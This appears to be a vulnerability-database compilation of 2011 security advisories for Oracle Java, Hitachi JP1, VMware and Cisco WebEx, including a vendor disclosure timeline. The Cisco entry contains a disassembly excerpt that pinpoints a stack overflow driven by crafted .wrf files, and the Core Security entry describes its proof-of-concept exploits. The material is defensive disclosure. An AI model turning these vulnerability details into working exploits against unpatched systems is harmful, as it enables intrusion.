http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4468
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4469
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4469
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4470
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4471
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4472
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4473
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4473
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4474
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4475
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4475
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4476
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4476
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0002
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0802
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0814
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0815
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0862
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0864
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0865
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0867
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0871
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0873
- ------------------------------------------------------------------------
6. Change log
2011-10-27 VMSA-2011-0013
Initial security advisory in conjunction with the release of
Update 2 for vCenter Server 4.1, vCenter Update Manager 4.1,
vSphere Hypervisor (ESXi) 4.1 and ESX 4.1 on 2011-10-27.
- ------------------------------------------------------------------------
7. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
* security-announce at lists.vmware.com
* bugtraq at securityfocus.com
* full-disclosure at lists.grok.org.uk
E-mail: security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Advisories
http://www.vmware.com/security/advisories
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html
Copyright 2011 VMware Inc. All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAk6qRrIACgkQDEcm8Vbi9kPemwCeM4Q4S8aRp8X/8/LQ8NGVdU8l
lJkAmweROyq5t0iWwM0EN2iP9ly6trbc
=Dm8O
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201111-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Oracle JRE/JDK: Multiple vulnerabilities
Date: November 05, 2011
Bugs: #340421, #354213, #370559, #387851
ID: 201111-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in the Oracle JRE/JDK,
allowing attackers to cause unspecified impact.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/sun-jre-bin < 1.6.0.29 >= 1.6.0.29 *
2 app-emulation/emul-linux-x86-java
< 1.6.0.29 >= 1.6.0.29 *
3 dev-java/sun-jdk < 1.6.0.29 >= 1.6.0.29 *
-------------------------------------------------------------------
NOTE: Packages marked with asterisks require manual intervention!
-------------------------------------------------------------------
3 affected packages
-------------------------------------------------------------------
Description
===========
Multiple vulnerabilities have been reported in the Oracle Java
implementation. Please review the CVE identifiers referenced below and
the associated Oracle Critical Patch Update Advisory for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Oracle JDK 1.6 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-java/sun-jdk-1.6.0.29"
All Oracle JRE 1.6 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-java/sun-jre-bin-1.6.0.29"
All users of the precompiled 32-bit Oracle JRE 1.6 should upgrade to
the latest version:
# emerge --sync
# emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.6.0.29"
NOTE: As Oracle has revoked the DLJ license for its Java
implementation, the packages can no longer be updated automatically.
This limitation is not present on a non-fetch restricted implementation
such as dev-java/icedtea-bin.
References
==========
[ 1 ] CVE-2010-3541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3541
[ 2 ] CVE-2010-3548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3548
[ 3 ] CVE-2010-3549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3549
[ 4 ] CVE-2010-3550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3550
[ 5 ] CVE-2010-3551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3551
[ 6 ] CVE-2010-3552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3552
[ 7 ] CVE-2010-3553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3553
[ 8 ] CVE-2010-3554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3554
[ 9 ] CVE-2010-3555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3555
[ 10 ] CVE-2010-3556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3556
[ 11 ] CVE-2010-3557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3557
[ 12 ] CVE-2010-3558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3558
[ 13 ] CVE-2010-3559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3559
[ 14 ] CVE-2010-3560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3560
[ 15 ] CVE-2010-3561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3561
[ 16 ] CVE-2010-3562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3562
[ 17 ] CVE-2010-3563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3563
[ 18 ] CVE-2010-3565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3565
[ 19 ] CVE-2010-3566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3566
[ 20 ] CVE-2010-3567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3567
[ 21 ] CVE-2010-3568
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3568
[ 22 ] CVE-2010-3569
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3569
[ 23 ] CVE-2010-3570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3570
[ 24 ] CVE-2010-3571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3571
[ 25 ] CVE-2010-3572
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3572
[ 26 ] CVE-2010-3573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3573
[ 27 ] CVE-2010-3574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3574
[ 28 ] CVE-2010-4422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4422
[ 29 ] CVE-2010-4447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4447
[ 30 ] CVE-2010-4448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4448
[ 31 ] CVE-2010-4450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4450
[ 32 ] CVE-2010-4451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4451
[ 33 ] CVE-2010-4452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4452
[ 34 ] CVE-2010-4454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4454
[ 35 ] CVE-2010-4462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4462
[ 36 ] CVE-2010-4463
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4463
[ 37 ] CVE-2010-4465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4465
[ 38 ] CVE-2010-4466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4466
[ 39 ] CVE-2010-4467
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4467
[ 40 ] CVE-2010-4468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4468
[ 41 ] CVE-2010-4469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4469
[ 42 ] CVE-2010-4470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4470
[ 43 ] CVE-2010-4471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4471
[ 44 ] CVE-2010-4472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4472
[ 45 ] CVE-2010-4473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4473
[ 46 ] CVE-2010-4474
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4474
[ 47 ] CVE-2010-4475
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4475
[ 48 ] CVE-2010-4476
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4476
[ 49 ] CVE-2011-0802
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0802
[ 50 ] CVE-2011-0814
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0814
[ 51 ] CVE-2011-0815
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0815
[ 52 ] CVE-2011-0862
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0862
[ 53 ] CVE-2011-0863
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0863
[ 54 ] CVE-2011-0864
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0864
[ 55 ] CVE-2011-0865
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0865
[ 56 ] CVE-2011-0867
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0867
[ 57 ] CVE-2011-0868
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0868
[ 58 ] CVE-2011-0869
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0869
[ 59 ] CVE-2011-0871
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0871
[ 60 ] CVE-2011-0872
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0872
[ 61 ] CVE-2011-0873
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0873
[ 62 ] CVE-2011-3389
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389
[ 63 ] CVE-2011-3516
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3516
[ 64 ] CVE-2011-3521
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3521
[ 65 ] CVE-2011-3544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3544
[ 66 ] CVE-2011-3545
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3545
[ 67 ] CVE-2011-3546
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3546
[ 68 ] CVE-2011-3547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3547
[ 69 ] CVE-2011-3548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3548
[ 70 ] CVE-2011-3549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3549
[ 71 ] CVE-2011-3550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3550
[ 72 ] CVE-2011-3551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3551
[ 73 ] CVE-2011-3552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3552
[ 74 ] CVE-2011-3553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3553
[ 75 ] CVE-2011-3554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3554
[ 76 ] CVE-2011-3555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3555
[ 77 ] CVE-2011-3556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3556
[ 78 ] CVE-2011-3557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3557
[ 79 ] CVE-2011-3558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3558
[ 80 ] CVE-2011-3560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3560
[ 81 ] CVE-2011-3561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3561
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201111-02.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
For more information see vulnerability #1 in:
SA43262
Please see the vendor's advisory for the list of affected products.
SOLUTION:
Update to a fixed version. Please see the vendor's advisory for more
details
| VAR-201101-0544 | No CVE | Hitachi JP1/NETM/DM Information Disclosure and Denial of Service Vulnerabilities |
CVSS V2: - CVSS V3: - Severity: - |
Hitachi JP1/NETM/DM is prone to a local information-disclosure vulnerability and a denial-of-service vulnerability.
Successfully exploiting these issues may allow an attacker to obtain sensitive information or cause the affected application to crash, denying service to legitimate users. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Hitachi JP1/NETM/DM Products Two Vulnerabilities
SECUNIA ADVISORY ID:
SA43140
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43140/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43140
RELEASE DATE:
2011-02-01
DISCUSS ADVISORY:
http://secunia.com/advisories/43140/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43140/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43140
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in various Hitachi products,
which can be exploited by malicious, local users to potentially gain
knowledge of sensitive information and malicious people to cause a
DoS (Denial of Service).
1) The permissions for certain files are not properly set, which
allows local users to access files that they are not intended to
access.
2) An unspecified error can be exploited to cause a DoS.
SOLUTION:
Update to fixed versions (please see the vendor's advisory for
details).
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
HS11-001 (Japanese):
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS11-001/index.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201102-0052 | CVE-2010-3269 | Cisco WRF and ARF Player T27LB Vulnerable to stack-based buffer overflow |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Multiple stack-based buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to execute arbitrary code via a crafted (1) .wrf or (2) .arf file, related to use of a function pointer in a callback mechanism. Cisco WebEx is a web conferencing solution. Cisco WebEx provides record format files for storing WebEX meeting notes, and WRF Player is an application for playing back and editing WRF files (files end with a .wrf extension). This vulnerability can be triggered by publishing a .wrf video file in a conference room: .text:6070C272 loc_6070C272: ; CODE XREF: sub_6070C050+255j.text:6070C272 test esi, esi.text:6070C274 jnz short loc_6070C28F.text:6070C276 push ebx.text :6070C277 call dword ptr [ebp+0Ch] ; call to function pointer on the stack.text:6070C27A add esp, 4.text:6070C27D test al, al.text:6070C27F jz loc_6070C374.text:6070C285 mov edi, [ebp+ 0].text:6070C288 mov esi, [ebp+4].text:6070C28B mov eax, [esp+0D98h+var_D80].text:6070C28F.text:6070C28F loc_6070C28F: ; CODE XREF: sub_6070C050+224j.text:6070C28F mov Cl, [edi] ; cl can be controlled, it is read from the malicious .wrf file.text:6070C291 dec esi.text:6070C292 mov [esp+eax+0D 98h+var_C8C], cl ; this mov overflows the stack with user controlled values.text:6070C299 mov ecx, [esp+0D98h+var_D84].text:6070C29D inc edi.text:6070C29E inc eax.text:6070C29F cmp eax, ecx .text:6070C2A1 mov [esp+0D98h+var_D80], eax.text:6070C2A5 jl short loc_6070C272. Cisco WebEx is prone to multiple remote buffer-overflow vulnerabilities because it fails to perform adequate boundary-checks on user-supplied data.
An attacker can exploit these issues to execute arbitrary code with the privileges of the affected application. Failed exploit attempts will result in a denial-of-service condition.
The Cisco WebEx Players are applications that are used to play back
WebEx meeting recordings that have been recorded on the computer of
an on-line meeting attendee. The players can be automatically
installed when the user accesses a recording file that is hosted on a
WebEx server. The player can also be manually installed for offline
playback after downloading the application from www.webex.com
If the WebEx recording player was automatically installed, it will be
automatically upgraded to the latest, non-vulnerable version when
users access a recording file that is hosted on a WebEx server. If
the WebEx recording player was manually installed, users will need to
manually install a new version of the player after downloading the
latest version from www.webex.com
Cisco has released free software updates that address these
vulnerabilities.
Affected Products
=================
Vulnerable Products
+------------------
The vulnerabilities disclosed in this advisory affect the Cisco WebEx
recording players. Microsoft Windows, Apple Mac OS X, and Linux
versions of the player are all affected. Affected versions of the
players are those prior to client builds T27LC SP22 and T27LB SP21
EP3. Customers who have contractual agreements that prevent WebEx
from automatically upgrading a recording player to the latest version
should contact their account manager to determine upgrade options.
To determine whether a Cisco WebEx server is running an affected
version of the WebEx client build, users can log in to their Cisco
WebEx server and go to the Support > Downloads section. The version
of the WebEx client build will be displayed on the right side of the
page under "About Support Center." See "Software Versions and Fixes"
for details.
Details
=======
The WebEx meeting service is a hosted multimedia conferencing
solution that is managed and maintained by Cisco WebEx. The WRF and
ARF file formats are used to store WebEx meeting recordings that have
been recorded on the computer of an on-line meeting attendee. The recording
players can be automatically installed when the user accesses a
recording file that is hosted on a WebEx server (for stream playback
mode). The recording players can also be manually installed after
downloading the application from www.webex.com/downloadplayer.html
to play back recording files locally (for offline
playback mode).
Multiple buffer overflow vulnerabilities exist in the WRF and ARF
players. The vulnerabilities may lead to a crash of the player
application or, in some cases, remote code execution could occur.
To exploit one of these vulnerabilities, the player application would
need to open a malicious WRF or ARF file. An attacker may be able to
accomplish this exploit by providing the malicious recording file
directly to users (for example, by using e-mail) or by directing a
user to a malicious web page.
These vulnerabilities have been assigned the following Common
Vulnerabilities and Exposures (CVE) identifiers:
* CVE-2010-3269
* CVE-2010-3041
* CVE-2010-3042
* CVE-2010-3043
* CVE-2010-3044
Vulnerability Scoring Details
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* Multiple Cisco WebEx Player Buffer Overflow Vulnerabilities
CVSS Base Score - 9.3
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.7
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerabilities described in this
document could result in a crash of the Cisco WebEx ARF Player or WRF
Player application and, in some cases, allow a remote attacker to
execute arbitrary code on the system with the privileges of the user
who is running the recording player application.
Software Versions and Fixes
===========================
When considering software upgrades, also consult http://www.cisco.com/go/psirt
and any subsequent advisories to determine exposure and a
complete upgrade solution.
These vulnerabilities are first fixed in T27LC SP22 and T27LB SP21
EP3.
The client build will be determined after the software is deployed.
The client build is listed in the Support > Downloads section of the
WebEx page after a user authenticates. WebEx bug fixes are cumulative
in a major release. For example, if release 27.22SP.0 is fixed,
release 27.22SP.1 will also have the software fix.
If a recording player was automatically installed, it will be
automatically upgraded to the latest, nonvulnerable version when
users access a recording file that is hosted on a WebEx server.
If a WebEx recording player was manually installed, users will need
to manually install a new version of the player after downloading the
latest version from www.webex.com/downloadplayer.html
Workarounds
===========
There are no workarounds for the vulnerabilities disclosed in this
advisory.
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
Cisco would like to thank these organizations for reporting these
vulnerabilities.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20110201-webex.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-Feb-01 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - Corelabs Advisory
http://corelabs.coresecurity.com/
Cisco WebEx .atp and .wrf Overflow Vulnerabilities
1. *Advisory Information*
Title: Cisco WebEx .atp and .wrf Overflow Vulnerabilities
Advisory ID: CORE-2010-1001
Advisory URL:
[http://www.coresecurity.com/content/webex-atp-and-wrf-overflow-vulnerabilities]
Date published: 2011-01-31
Date of last update: 2011-01-31
Vendors contacted: Cisco
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Stack-based Buffer Overflow [CWE-121], Stack-based Buffer
Overflow [CWE-121]
Impact: Code execution
Remotely Exploitable: Yes (client-side)
Locally Exploitable: No
CVE Name: CVE-2010-3269, CVE-2010-3270
Bugtraq ID: N/A
3. *Vulnerability Description*
There are stack overflows on WebEx [1] that can be exploited by sending
maliciously crafted .atp and .wrf files to a vulnerable WebEx user. When
opened, these files trigger a reliably exploitable stack based buffer
overflow. In the .atp case an exception
handler can be overwritten on the stack, and most registers can be
trivially overwritten.
4. *Vulnerable packages*
. Contact Cisco for a list of vulnerable versions.
5. *Non-vulnerable packages*
. Contact Cisco.
6. *Vendor Information, Solutions and Workarounds*
All clients of WebEx Meeting Center should now be running a patched
version according to Cisco. A non-vulnerable version of WebEx Player
should be available at [http://www.webex.com/downloadplayer.html].
7. *Credits*
These vulnerabilities were discovered and researched by Federico Muttis,
Sebastian Tello and Manuel Muradas from Core Security Technologies
during Bugweek 2010 as part of the "Cisco Baby Cisco!" team [2]. The
publication of this advisory was coordinated by Pedro Varangot.
8. *Technical Description*
8.1. *WebEx Player .wrf Buffer Overflow [CVE-2010-3269]*
WebEx Player can be used to playback recordings of WebEx sessions. These
recordings can be stored using the .wrf closed and undocumented file
format. This vulnerability can also be exploited by publishing a .wrf
video file in a meeting, resulting in the compromise of the meeting's
participants. *WebEx Meeting Center .atp Buffer Overflow [CVE-2010-3270]*
WebEx Meeting Center allows polls to be conducted between all
participants of a WebEx session. By serving a specially crafted .atp
file (used for conducting polls) the meeting host can then abruptly
disconnect from the server, and when another client becomes host and
tries to share the .atp file with the other clients arbitrary code
execution is possible on his workstation. If his connection to the
server is then severed by a malicious payload, the .atp file will be
cycled to the next connected client. We
developed trivial examples that take control of EIP using arbitrary
characters.
9. *Report Timeline*
. 2010-10-04:
Core Security Technologies contacts Cisco PSIRT using their provided PGP
key notifying them of the vulnerabilities and sending an advisory draft,
a proof of concept for the WebEx Player vulnerability, and a proof of
concept for the Meeting Center vulnerability including details of how to
reproduce both vulnerabilities, and details about the behaviour of the
PoC for the Player vulnerability on Windows XP SP2 (which overwrites EIP
with 0x41414141 on that platform). October 18th 2010 (a two weeks
timeframe) is set as a potential release date for the advisory. 2010-10-05:
Cisco PSIRT contacts Core stating that their development team is out of
the office till Friday October 8th. November 15th 2010 is mentioned as
an estimated release date for a fix. 2010-10-05:
Core replies to Cisco PSIRT postponing the release date of this advisory
for one week, to Monday October 25th, in order to contemplate the fact
that Cisco's development team is away from office for the week. Further
changes to the release date will be made after receiving technical
feedback. November the 15th is mentioned to be a possible date to settle
on. 2010-10-11:
Cisco PSIRT replies acknowledging "an exception in WebEx player" but
that doesn't overwrite EIP as Core Security Technologies indicated.
Cisco notifies that they were not able to reproduce the crash in WebEx
Meeting Center. Cisco PSIRT also asks for more detailed information
about the version of WebEx Player used. 2010-10-12:
Core sends the requested information, also attaching new proof of
concept exploits for the WebEx Player vulnerability (that now executes
code and launches "calc.exe"), and further details about the steps
needed to reproduce the WebEx Meeting Center crash. Details about the
system where the proof of concept for the WebEx Player vulnerability was
run are asked. Details about the "exception" are also asked, specially
noting that if other registers are overwritten this should be considered
as a vulnerability that would possibly lead to reliable code execution
even if EIP was not modified (as noted by Core on the e-mail where the
PoC was attached). No reply is received to this e-mail. 2010-10-19:
Core resends the previous e-mail asking for news about reproduction of
the vulnerability on Cisco's side and asking if there was any problem in
the reception or interpretation of the last communication. No reply is
received to this e-mail. 2010-10-28:
Core Security Technologies resends the last e-mail, unilaterally
rescheduling the publication of this advisory to November 8th 2010,
which is closer to Cisco's initial estimation for the release of a fix.
Core states its willingness to reschedule this publication date but only
under firm commitment from Cisco to working seriously towards fixing
this issue in a scheduled timeframe. An updated advisory draft is
